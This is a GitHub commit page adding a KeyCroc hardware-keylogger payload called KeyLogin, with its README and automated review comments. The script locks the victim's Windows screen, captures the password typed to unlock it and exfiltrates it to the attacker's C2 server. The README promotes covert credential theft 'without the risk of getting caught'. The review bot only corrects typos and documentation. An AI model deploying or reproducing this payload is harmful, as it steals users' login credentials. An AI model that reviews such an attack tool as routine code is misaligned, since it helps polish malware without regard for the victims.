Merge pull request #46 from 0iphor13/master

Uploaded KeyLogin
pull/47/merge
hak5glytch 2022-11-07 09:31:42 -08:00 committed by GitHub
commit 2da4c3f537
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 74 additions and 0 deletions

Binary file added (image, 14 KiB; not shown).

Binary file added (image, 24 KiB; not shown).

@ -0,0 +1,39 @@
###############################KeyLogin#####################################
# Version 1.1
# OS: Windows
# Author: 0iphor13
# Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
# Afterwards these will be exfiltrated to your CloudC2 instance. The most covert technique to get clear text credentials!
#
####################Defining Language,Trigger & Clean Up#####################
MATCH \[ENTER\]
Q DELAY 2000
export DUCKY_LANG=de
Q DELAY 2000
rm /root/loot/win-pass*
########################Locking User Machine################################
Q LOCK
Q DELAY 500
Q GUI l
C2NOTIFY INFO 'Locked Users Machine!'
Q DELAY 250
Q DELETE
Q DELAY 250
Q UNLOCK
WAIT_FOR_KEYBOARD_ACTIVITY 1
#######Define until which point you want to intercept the keystrokes########
SAVEKEYS /root/loot/win-pass.txt NEXT 4
Q DELAY 2000
while [ ! -f /root/loot/win-pass.txt ]; do sleep 2; done
#####################Exfiltrating Credentials###############################
C2EXFIL /root/loot/win-pass.txt
Q DELAY 1000
C2NOTIFY INFO 'User Credentials Received!'
#You may want to delete or disable to payload after execution to avoid endless logout processes
#rm /root/udisk/payloads/KeyLogin.txt
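Review bot: The header comment misspells "Description" (`# Discription: ...`) and leaves two behaviours the script depends on undocumented: `export DUCKY_LANG=de` hard-codes a German keyboard layout, which the README's "Configure payload language" step implies must be changed, and `rm /root/loot/win-pass*` discards any previous capture on every run, which the README's "separate file" wording does not mention. The commented-out `#rm /root/udisk/payloads/KeyLogin.txt` is the only thing preventing the `MATCH \[ENTER\]` trigger from re-firing on every Enter press (the "endless logout processes" the trailing comment warns about), so state in the header that this cleanup is disabled by default rather than leaving it to a one-line comment at the end. The header also claims "Version 1.1" although this is the initial upload; either note what changed from 1.0 or drop the version line.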


@ -0,0 +1,35 @@
**Title: KeyLogin**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.1<br>
Requirements: CloudC2 Instance</p>
**What is KeyLogin?**
#
*When using a KeyCroc, what is your goal? Likely credentials or remote access.*
*But many environments, especially within the banking sector are locked down.*
*Taking advantage of available resources not only facilitates the use of payloads, it also enables long, undetected actions during an engagement.*
*KeyLogin makes use of the Windows shortcut [Windows]+L to lock the system. Thanks to the KeyCrocs ability to sniff keystrokes, the password or pin can then be exfiltrated.*
*This payload automates login stealing. It waites for the victim to press enter (to avoid logging wrong credentials), then locks the targets screen and sends the received credentials to your C2 instance.*
*As there are different sorts of authentication types for windows systems, you can/need to configure until which point you want to intercept theses keystrokes. Until ENTER is pressed? Until a certain lenght was typed? It's up to you!*
#
There you go, login credentials, exfiltrated in an automated manner, without the risk of getting caught.
**Instruction:**
- Connect KeyCroc to C2
- Configure payload language and DELAYs
- Plugin KeyCroc & run away (pro tip: In the morning or after lunch your chances to get a good result are much higher)
- You might want to disable to payload after the first success to avoid locking out the user!
KeyCroc will Notify you of the current attack state
![alt text](https://github.com/0iphor13/keycroc-payloads/blob/master/payloads/library/credentials/KeyLogin/notifications.png)
KeyCroc will save the inserted credentials into a seperate file for you
![alt text](https://github.com/0iphor13/keycroc-payloads/blob/master/payloads/library/credentials/KeyLogin/loot.png)
Credit for support:
- Korben
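Review bot: The bare `#` lines after **What is KeyLogin?** and before "There you go" render as empty headings in Markdown; use a blank line or `---` as a separator, and make **What is KeyLogin?** and **Instruction:** proper `##` headings for consistency. The two images link to absolute URLs in `0iphor13/keycroc-payloads` instead of the relative paths `notifications.png` and `loot.png` that this commit adds, so they break if the fork is renamed or removed. Typos in the body: "waites" (waits), "targets screen" (target's screen), "theses" (these), "lenght" (length), "seperate" (separate), "KeyCrocs ability" (KeyCroc's ability), "Plugin KeyCroc" (Plug in KeyCroc), and "disable to payload" (disable the payload).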